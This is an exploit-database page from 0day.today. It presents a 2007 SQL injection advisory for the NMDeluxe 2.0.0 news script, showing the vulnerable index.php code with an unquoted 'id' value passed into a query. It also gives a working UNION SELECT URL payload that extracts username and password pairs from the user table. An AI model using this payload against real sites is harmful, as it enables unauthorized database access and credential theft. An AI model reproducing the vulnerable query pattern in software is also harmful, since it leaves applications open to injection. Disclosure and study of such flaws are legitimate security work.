[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

NMDeluxe 2.0.0 (id) Remote SQL Injection Vulnerability

Author
not sec group
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2100
Category
web applications
Date add
29-08-2007
Platform
unsorted
======================================================
NMDeluxe 2.0.0 (id) Remote SQL Injection Vulnerability
======================================================




#########################################################################################
#
#                                    not sec group
#
#
#       [NMDeluxe 2.0.0]
#
# Class:     SQL Injection
# Found:     30/08/2007
# Remote:    Yes
# Site:      http://www.wsdeluxe.com/nmdeluxe/
# Download:  http://downloads.sourceforge.net/nmdeluxe/nmdeluxe2.0.0.zip?modtime=1178396844&big_mirror=0
#
#########################################################################################


      Vulnerable code:
      index.php
============================================================================================================
if($_GET['do'] == 'newspost')
{
  $newsid=addslashes($_GET['id']);

  $sql=mysql_query('SELECT * FROM `'.DB_PFX.'news` WHERE id = ' . $newsid . ' LIMIT ' . $nlim . '');
============================================================================================================


      Exploit :
============================================================================================================================================================================================
http://www.site.com/[nmdeluxe]/index.php?do=newspost&id=-1%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,concat(username,0x3a,password)%20FROM%20nmd_user/*
============================================================================================================================================================================================


      Thanks To:
=================================
All notsec.com members;
White_Sheep for his Bugs Hunter;
=================================



#  0day.today [2024-12-24]  #